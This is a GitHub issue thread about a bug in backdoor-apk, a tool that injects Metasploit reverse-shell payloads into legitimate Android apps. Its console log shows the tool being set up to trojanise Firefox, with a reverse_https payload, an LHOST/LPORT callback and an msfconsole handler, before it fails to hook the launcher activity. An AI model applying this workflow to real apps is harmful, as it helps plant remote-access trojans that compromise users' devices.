### ISSUE TITLE
Locating smali file to hook logic fails with Firefox APK

### ISSUE THREAD

**Issue by dana-at-cp** [dana-at-cp/backdoor-apk#89]
```
root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh Firefox_50.1.0.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.0 on Mon Feb 27 10:56:24 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[!] Failed to locate smali file to hook
root@kali:~/Code/github/backdoor-apk/backdoor-apk#
```

Relevant content from run.log file:

```
Found launcher line in manifest file: 222
Activity lines found above launcher line: 3
Value of android_target_activity: org/mozilla/gecko/LauncherActivity
Value of android_name: /App
The launcher line appears to be within an activity-alias element
Value of tmp: org/mozilla/gecko/LauncherActivity
The smali file to hook: /root/Code/github/backdoor-apk/backdoor-apk/original/smali_classes1000/org/mozilla/firefoxorg/mozilla/gecko/LauncherActivity.smali
Forcing cleanup due to a failure or error state!
```

**Comment by dana-at-cp** [comment]
A fix is now on the develop branch. It will go out with the 0.2.1 release.

**Comment by dana-at-cp** [comment]
Fixed in version 0.2.1 now on master.
